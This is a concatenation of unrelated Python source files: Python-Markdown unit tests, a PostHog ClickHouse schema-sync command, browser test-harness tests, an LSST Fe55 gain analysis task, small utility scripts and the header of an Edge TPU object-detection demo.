r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
r.register(Item('c'), 'c', 40)
slc = r[1:]
self.assertEqual(len(slc), 2)
self.assertIsInstance(slc, markdown.util.Registry)
self.assertEqual(list(slc), ['b', 'a'])
def testGetIndexForName(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b'), 'b', 30)
self.assertEqual(r.get_index_for_name('a'), 1)
self.assertEqual(r.get_index_for_name('b'), 0)
with self.assertRaises(ValueError):
r.get_index_for_name('c')
def testRegisterDupplicate(self):
r = markdown.util.Registry()
r.register(Item('a'), 'a', 20)
r.register(Item('b1'), 'b', 10)
self.assertEqual(list(r), ['a', 'b1'])
self.assertEqual(len(r), 2)
r.register(Item('b2'), 'b', 30)
self.assertEqual(len(r), 2)
self.assertEqual(list(r), ['b2', 'a'])
class TestErrors(unittest.TestCase):
""" Test Error Reporting. """
def setUp(self):
# Set warnings to be raised as errors
warnings.simplefilter('error')
def tearDown(self):
# Reset warning behavior back to default
warnings.simplefilter('default')
def testBadOutputFormat(self):
""" Test failure on bad output_format. """
self.assertRaises(KeyError, markdown.Markdown, output_format='invalid')
def testLoadExtensionFailure(self):
""" Test failure of an extension to load. """
self.assertRaises(
ImportError,
markdown.Markdown, extensions=['non_existant_ext']
)
def testLoadBadExtension(self):
""" Test loading of an Extension with no makeExtension function. """
self.assertRaises(AttributeError, markdown.Markdown, extensions=['markdown.util'])
def testNonExtension(self):
""" Test loading a non Extension object as an extension. """
self.assertRaises(TypeError, markdown.Markdown, extensions=[object])
def testDotNotationExtensionWithBadClass(self):
""" Test Extension loading with non-existent class name (`path.to.module:Class`). """
self.assertRaises(
AttributeError,
markdown.Markdown,
extensions=['markdown.extensions.footnotes:MissingExtension']
)
def testBaseExtention(self):
""" Test that the base Extension class will raise NotImplemented. """
self.assertRaises(
NotImplementedError,
markdown.Markdown, extensions=[markdown.extensions.Extension()]
)
class testETreeComments(unittest.TestCase):
"""
Test that ElementTree Comments work.
These tests should only be a concern when using cElementTree with third
party serializers (including markdown's (x)html serializer). While markdown
doesn't use ElementTree.Comment itself, we should certainly support any
third party extensions which may. Therefore, these tests are included to
ensure such support is maintained.
"""
def setUp(self):
# Create comment node
self.comment = etree.Comment('foo')
def testCommentIsComment(self):
""" Test that an ElementTree Comment passes the `is Comment` test. """
self.assertIs(self.comment.tag, etree.Comment)
def testCommentIsBlockLevel(self):
""" Test that an ElementTree Comment is recognized as BlockLevel. """
md = markdown.Markdown()
self.assertIs(md.is_block_level(self.comment.tag), False)
def testCommentSerialization(self):
""" Test that an ElementTree Comment serializes properly. """
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->'
)
def testCommentPrettify(self):
""" Test that an ElementTree Comment is prettified properly. """
pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
pretty.run(self.comment)
self.assertEqual(
markdown.serializers.to_html_string(self.comment),
'<!--foo-->\n'
)
class testElementTailTests(unittest.TestCase):
""" Element Tail Tests """
def setUp(self):
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(markdown.Markdown())
def testBrTailNoNewline(self):
""" Test that last <br> in tree has a new line tail """
root = etree.Element('root')
br = etree.SubElement(root, 'br')
self.assertEqual(br.tail, None)
self.pretty.run(root)
self.assertEqual(br.tail, "\n")
class testElementPreCodeTests(unittest.TestCase):
""" Element PreCode Tests """
def setUp(self):
md = markdown.Markdown()
self.pretty = markdown.treeprocessors.PrettifyTreeprocessor(md)
def prettify(self, xml):
root = etree.fromstring(xml)
self.pretty.run(root)
return etree.tostring(root, encoding="unicode", short_empty_elements=False)
def testPreCodeEmpty(self):
xml = "<pre><code></code></pre>"
expected = "<pre><code></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithChildren(self):
xml = "<pre><code> <span /></code></pre>"
expected = "<pre><code> <span></span></code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithSpaceOnly(self):
xml = "<pre><code> </code></pre>"
expected = "<pre><code>\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithText(self):
xml = "<pre><code> hello</code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
def testPreCodeWithTrailingSpace(self):
xml = "<pre><code> hello </code></pre>"
expected = "<pre><code> hello\n</code></pre>\n"
self.assertEqual(expected, self.prettify(xml))
class testSerializers(unittest.TestCase):
""" Test the html and xhtml serializers. """
def testHtml(self):
""" Test HTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo <&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_html_string(el),
'<div id="foo<&">">'
'<p hidden>foo <&escaped></p>'
'<hr>'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testXhtml(self):
"""" Test XHTML serialization. """
el = etree.Element('div')
el.set('id', 'foo<&">')
p = etree.SubElement(el, 'p')
p.text = 'foo<&escaped>'
p.set('hidden', 'hidden')
etree.SubElement(el, 'hr')
non_element = etree.SubElement(el, None)
non_element.text = 'non-element text'
script = etree.SubElement(non_element, 'script')
script.text = '<&"test\nescaping">'
el.tail = "tail text"
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div id="foo<&">">'
'<p hidden="hidden">foo<&escaped></p>'
'<hr />'
'non-element text'
'<script><&"test\nescaping"></script>'
'</div>tail text'
)
def testMixedCaseTags(self):
"""" Test preservation of tag case. """
el = etree.Element('MixedCase')
el.text = 'not valid '
em = etree.SubElement(el, 'EMPHASIS')
em.text = 'html'
etree.SubElement(el, 'HR')
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<MixedCase>not valid <EMPHASIS>html</EMPHASIS><HR /></MixedCase>'
)
def testProsessingInstruction(self):
""" Test serialization of ProcessignInstruction. """
pi = ProcessingInstruction('foo', text='<&"test\nescaping">')
self.assertIs(pi.tag, ProcessingInstruction)
self.assertEqual(
markdown.serializers.to_xhtml_string(pi),
'<?foo <&"test\nescaping">?>'
)
def testQNameTag(self):
""" Test serialization of QName tag. """
div = etree.Element('div')
qname = etree.QName('http://www.w3.org/1998/Math/MathML', 'math')
math = etree.SubElement(div, qname)
math.set('display', 'block')
sem = etree.SubElement(math, 'semantics')
msup = etree.SubElement(sem, 'msup')
mi = etree.SubElement(msup, 'mi')
mi.text = 'x'
mn = etree.SubElement(msup, 'mn')
mn.text = '2'
ann = etree.SubElement(sem, 'annotations')
ann.text = 'x^2'
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div>'
'<math display="block" xmlns="http://www.w3.org/1998/Math/MathML">'
'<semantics>'
'<msup>'
'<mi>x</mi>'
'<mn>2</mn>'
'</msup>'
'<annotations>x^2</annotations>'
'</semantics>'
'</math>'
'</div>'
)
def testQNameAttribute(self):
""" Test serialization of QName attribute. """
div = etree.Element('div')
div.set(etree.QName('foo'), etree.QName('bar'))
self.assertEqual(
markdown.serializers.to_xhtml_string(div),
'<div foo="bar"></div>'
)
def testBadQNameTag(self):
""" Test serialization of QName with no tag. """
qname = etree.QName('http://www.w3.org/1998/Math/MathML')
el = etree.Element(qname)
self.assertRaises(ValueError, markdown.serializers.to_xhtml_string, el)
def testQNameEscaping(self):
""" Test QName escaping. """
qname = etree.QName('<&"test\nescaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def testQNamePreEscaping(self):
""" Test QName that is already partially escaped. """
qname = etree.QName('<&"test escaping">', 'div')
el = etree.Element(qname)
self.assertEqual(
markdown.serializers.to_xhtml_string(el),
'<div xmlns="<&"test escaping">"></div>'
)
def buildExtension(self):
""" Build an extension which registers fakeSerializer. """
def fakeSerializer(elem):
# Ignore input and return hardcoded output
return '<div><p>foo</p></div>'
class registerFakeSerializer(markdown.extensions.Extension):
def extendMarkdown(self, md):
md.output_formats['fake'] = fakeSerializer
return registerFakeSerializer()
def testRegisterSerializer(self):
self.assertEqual(
markdown.markdown(
'baz', extensions=[self.buildExtension()], output_format='fake'
),
'<p>foo</p>'
)
def testXHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='xhtml'),
'<p>foo<br />\nbar</p>'
)
def testHTMLOutput(self):
self.assertEqual(
markdown.markdown('foo \nbar', output_format='html'),
'<p>foo<br>\nbar</p>'
)
class testAtomicString(unittest.TestCase):
""" Test that AtomicStrings are honored (not parsed). """
def setUp(self):
md = markdown.Markdown()
self.inlineprocessor = md.treeprocessors['inline']
def testString(self):
""" Test that a regular string is parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = 'some *text*'
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some <em>text</em></p></div>'
)
def testSimpleAtomicString(self):
""" Test that a simple AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('some *text*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>some *text*</p></div>'
)
def testNestedAtomicString(self):
""" Test that a nested AtomicString is not parsed. """
tree = etree.Element('div')
p = etree.SubElement(tree, 'p')
p.text = markdown.util.AtomicString('*some* ')
span1 = etree.SubElement(p, 'span')
span1.text = markdown.util.AtomicString('*more* ')
span2 = etree.SubElement(span1, 'span')
span2.text = markdown.util.AtomicString('*text* ')
span3 = etree.SubElement(span2, 'span')
span3.text = markdown.util.AtomicString('*here*')
span3.tail = markdown.util.AtomicString(' *to*')
span2.tail = markdown.util.AtomicString(' *test*')
span1.tail = markdown.util.AtomicString(' *with*')
new = self.inlineprocessor.run(tree)
self.assertEqual(
markdown.serializers.to_html_string(new),
'<div><p>*some* <span>*more* <span>*text* <span>*here*</span> '
'*to*</span> *test*</span> *with*</p></div>'
)
class TestConfigParsing(unittest.TestCase):
def assertParses(self, value, result):
self.assertIs(markdown.util.parseBoolValue(value, False), result)
def testBooleansParsing(self):
self.assertParses(True, True)
self.assertParses('novalue', None)
self.assertParses('yES', True)
self.assertParses('FALSE', False)
self.assertParses(0., False)
self.assertParses('none', False)
def testPreserveNone(self):
self.assertIsNone(markdown.util.parseBoolValue('None', preserve_none=True))
self.assertIsNone(markdown.util.parseBoolValue(None, preserve_none=True))
def testInvalidBooleansParsing(self):
self.assertRaises(ValueError, markdown.util.parseBoolValue, 'novalue')
class TestCliOptionParsing(unittest.TestCase):
""" Test parsing of Command Line Interface Options. """
def setUp(self):
self.default_options = {
'input': None,
'output': None,
'encoding': None,
'output_format': 'xhtml',
'lazy_ol': True,
'extensions': [],
'extension_configs': {},
}
self.tempfile = ''
def tearDown(self):
if os.path.isfile(self.tempfile):
os.remove(self.tempfile)
def testNoOptions(self):
options, logging_level = parse_options([])
self.assertEqual(options, self.default_options)
self.assertEqual(logging_level, CRITICAL)
def testQuietOption(self):
options, logging_level = parse_options(['-q'])
self.assertGreater(logging_level, CRITICAL)
def testVerboseOption(self):
options, logging_level = parse_options(['-v'])
self.assertEqual(logging_level, WARNING)
def testNoisyOption(self):
options, logging_level = parse_options(['--noisy'])
self.assertEqual(logging_level, DEBUG)
def testInputFileOption(self):
options, logging_level = parse_options(['foo.txt'])
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testOutputFileOption(self):
options, logging_level = parse_options(['-f', 'foo.html'])
self.default_options['output'] = 'foo.html'
self.assertEqual(options, self.default_options)
def testInputAndOutputFileOptions(self):
options, logging_level = parse_options(['-f', 'foo.html', 'foo.txt'])
self.default_options['output'] = 'foo.html'
self.default_options['input'] = 'foo.txt'
self.assertEqual(options, self.default_options)
def testEncodingOption(self):
options, logging_level = parse_options(['-e', 'utf-8'])
self.default_options['encoding'] = 'utf-8'
self.assertEqual(options, self.default_options)
def testOutputFormatOption(self):
options, logging_level = parse_options(['-o', 'html'])
self.default_options['output_format'] = 'html'
self.assertEqual(options, self.default_options)
def testNoLazyOlOption(self):
options, logging_level = parse_options(['-n'])
self.default_options['lazy_ol'] = False
self.assertEqual(options, self.default_options)
def testExtensionOption(self):
options, logging_level = parse_options(['-x', 'markdown.extensions.footnotes'])
self.default_options['extensions'] = ['markdown.extensions.footnotes']
self.assertEqual(options, self.default_options)
def testMultipleExtensionOptions(self):
options, logging_level = parse_options([
'-x', 'markdown.extensions.footnotes',
'-x', 'markdown.extensions.smarty'
])
self.default_options['extensions'] = [
'markdown.extensions.footnotes',
'markdown.extensions.smarty'
]
self.assertEqual(options, self.default_options)
def create_config_file(self, config):
""" Helper to create temp config files. """
if not isinstance(config, str):
# convert to string
config = yaml.dump(config)
fd, self.tempfile = tempfile.mkstemp('.yml')
with os.fdopen(fd, 'w') as fp:
fp.write(config)
def testExtensionConfigOption(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def textBoolExtensionConfigOption(self):
config = {
'markdown.extensions.toc': {
'title': 'Some Title',
'anchorlink': True,
'permalink': True
}
}
self.create_config_file(config)
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionAsJSON(self):
config = {
'markdown.extensions.wikilinks': {
'base_url': 'http://example.com/',
'end_url': '.html',
'html_class': 'test',
},
'markdown.extensions.footnotes:FootnotesExtension': {
'PLACE_MARKER': '~~~footnotes~~~'
}
}
import json
self.create_config_file(json.dumps(config))
options, logging_level = parse_options(['-c', self.tempfile])
self.default_options['extension_configs'] = config
self.assertEqual(options, self.default_options)
def testExtensionConfigOptionMissingFile(self):
self.assertRaises(IOError, parse_options, ['-c', 'missing_file.yaml'])
def testExtensionConfigOptionBadFormat(self):
config = """
[footnotes]
PLACE_MARKER= ~~~footnotes~~~
"""
self.create_config_file(config)
self.assertRaises(yaml.YAMLError, parse_options, ['-c', self.tempfile])
class TestEscapeAppend(unittest.TestCase):
""" Tests escape character append. """
def testAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.ESCAPED_CHARS.append('|')
self.assertEqual('|' in md.ESCAPED_CHARS, True)
md2 = markdown.Markdown()
self.assertEqual('|' not in md2.ESCAPED_CHARS, True)
class TestBlockAppend(unittest.TestCase):
""" Tests block kHTML append. """
def testBlockAppend(self):
""" Test that appended escapes are only in the current instance. """
md = markdown.Markdown()
md.block_level_elements.append('test')
self.assertEqual('test' in md.block_level_elements, True)
md2 = markdown.Markdown()
self.assertEqual('test' not in md2.block_level_elements, True)
class TestAncestorExclusion(unittest.TestCase):
""" Tests exclusion of tags in ancestor list. """
class AncestorExample(markdown.inlinepatterns.SimpleTagInlineProcessor):
""" Ancestor Test. """
ANCESTOR_EXCLUDES = ('a',)
def handleMatch(self, m, data):
""" Handle match. """
el = etree.Element(self.tag)
el.text = m.group(2)
return el, m.start(0), m.end(0)
class AncestorExtension(markdown.Extension):
def __init__(self, *args, **kwargs):
"""Initialize."""
self.config = {}
def extendMarkdown(self, md):
"""Modify inline patterns."""
pattern = r'(\+)([^\+]+)\1'
md.inlinePatterns.register(TestAncestorExclusion.AncestorExample(pattern, 'strong'), 'ancestor-test', 0)
def setUp(self):
"""Setup markdown object."""
self.md = markdown.Markdown(extensions=[TestAncestorExclusion.AncestorExtension()])
def test_ancestors(self):
""" Test that an extension can exclude parent tags. """
test = """
Some +test+ and a [+link+](http://test.com)
"""
result = """<p>Some <strong>test</strong> and a <a href="http://test.com">+link+</a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
def test_ancestors_tail(self):
""" Test that an extension can exclude parent tags when dealing with a tail. """
test = """
[***+em+*+strong+**](http://test.com)
"""
result = """<p><a href="http://test.com"><strong><em>+em+</em>+strong+</strong></a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
|
py | 1a38beee48a0c3835f6511c156410d11d5a5c23c | # Copyright 2021 c00k1ez (https://github.com/c00k1ez). All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = "0.0.1.5"
from .yttm_tokenizer import BPEWrapper
|
py | 1a38bf46d325d5e73b617a20d7e3ea564055d3ba | import re
from collections import defaultdict
from typing import Dict, Set
import structlog
from django.conf import settings
from django.core.management.base import BaseCommand
from ee.clickhouse.sql.schema import CREATE_TABLE_QUERIES, get_table_name
from posthog.client import sync_execute
logger = structlog.get_logger(__name__)
TableName = str
Query = str
HostName = str
class Command(BaseCommand):
help = "Synchronize schema across clickhouse cluster, creating missing tables on new nodes"
def add_arguments(self, parser):
parser.add_argument(
"--dry-run", action="store_true", help="Exits with a non-zero status if schema changes would be required."
)
def handle(self, *args, **options):
if not settings.CLICKHOUSE_REPLICATION or settings.MULTI_TENANCY:
logger.info("โ
Skipping non-replicated or cloud setup")
return
host_tables, create_table_queries, out_of_sync_hosts = self.analyze_cluster_tables()
if len(out_of_sync_hosts) > 0:
logger.info("Schema out of sync on some clickhouse nodes!", out_of_sync_hosts=out_of_sync_hosts)
if options.get("dry_run"):
exit(1)
else:
self.create_missing_tables(out_of_sync_hosts, create_table_queries)
logger.info("โ
All ClickHouse nodes schema in sync")
def analyze_cluster_tables(self):
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
rows = sync_execute(
"""
SELECT hostName() as host, name, create_table_query
FROM clusterAllReplicas(%(cluster)s, system, tables)
WHERE database = %(database)s
AND name IN %(table_names)s
""",
{
"cluster": settings.CLICKHOUSE_CLUSTER,
"database": settings.CLICKHOUSE_DATABASE,
"table_names": table_names,
},
)
host_tables: Dict[HostName, Set[TableName]] = defaultdict(set)
create_table_queries: Dict[TableName, Query] = {}
for host, table_name, create_table_query in rows:
host_tables[host].add(table_name)
create_table_queries[table_name] = create_table_query
return host_tables, create_table_queries, self.get_out_of_sync_hosts(host_tables)
def get_out_of_sync_hosts(self, host_tables: Dict[HostName, Set[TableName]]) -> Dict[HostName, Set[TableName]]:
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
out_of_sync = {}
for host, tables in host_tables.items():
missing_tables = set(table_names) - tables
if len(missing_tables) > 0:
out_of_sync[host] = missing_tables
return out_of_sync
def create_missing_tables(
self, out_of_sync_hosts: Dict[HostName, Set[TableName]], create_table_queries: Dict[TableName, Query]
):
missing_tables = set(table for tables in out_of_sync_hosts.values() for table in tables)
logger.info("Creating missing tables", missing_tables=missing_tables)
for table in missing_tables:
query = create_table_queries[table]
sync_execute(self.run_on_cluster(query))
def run_on_cluster(self, create_table_query: Query) -> Query:
return re.sub(
r"^CREATE TABLE (\S+)",
f"CREATE TABLE IF NOT EXISTS \\1 ON CLUSTER '{settings.CLICKHOUSE_CLUSTER}'",
create_table_query,
1,
)
|
py | 1a38c00cd5793f440fc7273b825e31cfa7d4ac9d | from os.path import join, dirname
import mock
import pytest
from .base import all_products, active_products
from .. import environment
from .. import products
test_paths = {"/": {"tests_path": join(dirname(__file__), "..", "..", "..", "..")}} # repo root
environment.do_delayed_imports(None, test_paths)
@active_products("product")
def test_load_active_product(product):
"""test we can successfully load the product of the current testenv"""
products.Product({}, product)
# test passes if it doesn't throw
@all_products("product")
def test_load_all_products(product):
"""test every product either loads or throws ImportError"""
try:
products.Product({}, product)
except ImportError:
pass
@active_products("product", marks={
"sauce": pytest.mark.skip("needs env extras kwargs"),
})
def test_server_start_config(product):
product_data = products.Product({}, product)
env_extras = product_data.get_env_extras()
with mock.patch.object(environment.serve, "start") as start:
with environment.TestEnvironment(test_paths,
1,
False,
False,
None,
product_data.env_options,
{"type": "none"},
env_extras):
start.assert_called_once()
args = start.call_args
config = args[0][1]
if "server_host" in product_data.env_options:
assert config["server_host"] == product_data.env_options["server_host"]
else:
assert config["server_host"] == config["browser_host"]
assert isinstance(config["bind_address"], bool)
|
py | 1a38c00fd21fb41f3c2a440f12be81e54b6d5fe7 | def valid_parentheses(string):
result=[char for char in string if char in "()"]
comp=-1
total=len(result)
if len(result)%2==1:
return False
index=0
while True:
if total==0:
return True
if index>=total-1:
index=0
total=len(result)
if comp==total:
return False
comp=total
if result[index+1]==")" and result[index]=="(":
del result[index:index+2]
total-=2
index+=1 |
py | 1a38c0c29ab34f447c75c9e8aad15de412190e3d | from typing import List, Dict, Set
import random
from mdp import MarkovDecisionProcedure
class RandomPolicy:
def __init__(self):
self._actions_for_state: Dict[Any, List[Any]] = dict()
def suggest_action_for_state(self, state):
choices = self._actions_for_state[state]
if len(choices) > 0:
return random.choice(choices)
else:
# ... in a terminal state
return None
def is_new_state(self, state) -> bool:
return not state in self._actions_for_state
def initialize_state(self, state, available_actions: Set):
self._actions_for_state[state] = list(available_actions)
def initialize_new_episode(self):
# Nothing to prepare in this policy
pass
|
py | 1a38c1876cfc5543f1aecd6ecf57bfa460d9f598 | from setuptools import setup, find_packages
setup(
name='traj_restapi',
version='1.0.0',
description='RESTful API for trajectory information.',
url='https://github.com/Stuartlab-UCSC/traj-restapi',
author='Duncan McColl',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='rest restful api flask swagger openapi flask-restplus',
packages=find_packages(),
install_requires=['flask-restplus==0.9.2', 'Flask-SQLAlchemy==2.1'],
)
|
py | 1a38c1f4aa43a4e850c14047dba0dd7d64eabcde | """Class to analyze the gains from fe55 cluster fitting"""
import numpy as np
from lsst.eotest.sensor import Fe55GainFitter
from lsst.eo_utils.base.defaults import ALL_SLOTS
from lsst.eo_utils.base.config_utils import EOUtilOptions
from lsst.eo_utils.base.data_utils import TableDict, vstack_tables
from lsst.eo_utils.base.factory import EO_TASK_FACTORY
from lsst.eo_utils.fe55.meta_analysis import Fe55RaftTableAnalysisConfig,\
Fe55RaftTableAnalysisTask,\
Fe55SummaryAnalysisConfig, Fe55SummaryAnalysisTask
class Fe55GainStatsConfig(Fe55RaftTableAnalysisConfig):
"""Configuration for Fe55GainStatsTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-clusters')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-stats')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainStatsTask(Fe55RaftTableAnalysisTask):
"""Analyze the gains using the fe55 cluster fit results"""
ConfigClass = Fe55GainStatsConfig
_DefaultName = "Fe55GainStatsTask"
plot_names = ['gain']
def extract(self, butler, data, **kwargs):
"""Extract the gains and widths from the f355 clusters
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
use_all = self.config.use_all
data_dict = dict(kalpha_peak=[],
kalpha_sigma=[],
ncluster=[],
ngood=[],
gain=[],
gain_error=[],
fit_xmin=[],
fit_xmax=[],
fit_pars=[],
fit_nbins=[],
sigmax_median=[],
sigmay_median=[],
slot=[],
amp=[])
self.log_info_raft_msg(self.config, "")
for islot, slot in enumerate(ALL_SLOTS):
self.log_progress(" %s" % slot)
basename = data[slot]
dtables = TableDict(basename)
for amp in range(16):
table = dtables['amp%02i' % (amp+1)]
if use_all:
mask = np.ones((len(table)), bool)
else:
mask = (np.fabs(table['XPOS'] - table['XPEAK']) < 1)*\
(np.fabs(table['YPOS'] - table['YPEAK']) < 1)
tablevals = table[mask]['DN']
gainfitter = Fe55GainFitter(tablevals)
try:
kalpha_peak, kalpha_sigma = gainfitter.fit(bins=100)
gain = gainfitter.gain
gain_error = gainfitter.gain_error
pars = gainfitter.pars
except Exception:
kalpha_peak, kalpha_sigma = (np.nan, np.nan)
gain = np.nan
gain_error = np.nan
pars = np.nan * np.ones((4))
data_dict['kalpha_peak'].append(kalpha_peak)
data_dict['kalpha_sigma'].append(kalpha_sigma)
data_dict['gain'].append(gain)
data_dict['gain_error'].append(gain_error)
xra = gainfitter.xrange
data_dict['ncluster'].append(mask.size)
data_dict['ngood'].append(mask.sum())
if xra is None:
data_dict['fit_xmin'].append(np.nan)
data_dict['fit_xmax'].append(np.nan)
else:
data_dict['fit_xmin'].append(xra[0])
data_dict['fit_xmax'].append(xra[1])
data_dict['fit_pars'].append(pars)
data_dict['fit_nbins'].append(100.)
data_dict['sigmax_median'].append(np.median(table['SIGMAX']))
data_dict['sigmay_median'].append(np.median(table['SIGMAY']))
data_dict['slot'].append(islot)
data_dict['amp'].append(amp)
self.log_progress("Done!")
outtables = TableDict()
outtables.make_datatable("fe55_gain_stats", data_dict)
return outtables
def plot(self, dtables, figs, **kwargs):
"""Plot the gain results from the fe55 study
It should use a `TableDict` object to create a set of
plots and fill a `FigureDict` object
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_stats']
figs.plot_stat_color('gain', sumtable['gain'].reshape(9, 16))
class Fe55GainSummaryConfig(Fe55SummaryAnalysisConfig):
"""Configuration for Fe55GainSummaryTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-gain-stats')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-sum')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainSummaryTask(Fe55SummaryAnalysisTask):
"""Sumarize the results of the Fe55 gain analyses"""
ConfigClass = Fe55GainSummaryConfig
_DefaultName = "Fe55GainSummaryTask"
plot_names = ['gain', 'sigmax', 'fgood']
def extract(self, butler, data, **kwargs):
"""Make a summry table of the fe55 data
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
for key, val in data.items():
data[key] = val.replace('_fe55-gain-sum.fits', '_fe55-gain-stats.fits')
remove_cols = ['fit_pars']
if not self.config.skip:
outtable = vstack_tables(data, tablename='fe55_gain_stats',
remove_cols=remove_cols)
dtables = TableDict()
dtables.add_datatable('fe55_gain_sum', outtable)
dtables.make_datatable('runs', dict(runs=sorted(data.keys())))
return dtables
def plot(self, dtables, figs, **kwargs):
"""Plot the summary data from the fe55 study
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_sum']
runtable = dtables['runs']
yvals = sumtable['gain'].flatten().clip(0., 2.)
yerrs = sumtable['gain_error'].flatten().clip(0., 0.5)
runs = runtable['runs']
figs.plot_run_chart("gain", runs, yvals, yerrs=yerrs, ylabel="Gain")
yvals = sumtable['sigmax_median'].flatten().clip(0., 2.)
figs.plot_run_chart("sigmax", runs, yvals, ylabel="Cluster width [pixels]")
yvals = sumtable['ngood']/sumtable['ncluster']
figs.plot_run_chart("fgood", runs, yvals, ylabel="Fraction of good clusters")
EO_TASK_FACTORY.add_task_class('Fe55GainStats', Fe55GainStatsTask)
EO_TASK_FACTORY.add_task_class('Fe55GainSummary', Fe55GainSummaryTask)
|
py | 1a38c2c00e941267d3d484ce416535f281d0d3d1 | import os
import shutil
N = 6
data_root = "/media/data/umutlu/AIC20_track4/"
original_image_folder = data_root + "test_ori_images/"
subset_folder = data_root + "subset_test_ori_images/"
for i in range(1, 101):
org_video_folder = original_image_folder + str(i) + "/"
subset_video_folder = subset_folder + str(i) + "/"
os.makedirs(subset_video_folder, exist_ok=True)
files = os.listdir(org_video_folder)
f = 1
while f < len(files):
shutil.copyfile(org_video_folder + str(f) + ".jpg", subset_video_folder + str(f) + ".jpg")
f += N
print("Video " + str(i) + " is done.")
|
py | 1a38c2e1540c82d15c306d2c3f0b34a35521e8f8 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A demo which runs object detection on camera frames.
export TEST_DATA=/usr/lib/python3/dist-packages/edgetpu/test_data
Run face detection model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
Run coco model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--labels ${TEST_DATA}/coco_labels.txt
"""
import argparse
import collections
import colorsys
import itertools
import time
from pytz import utc,timezone
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
import datetime
import time
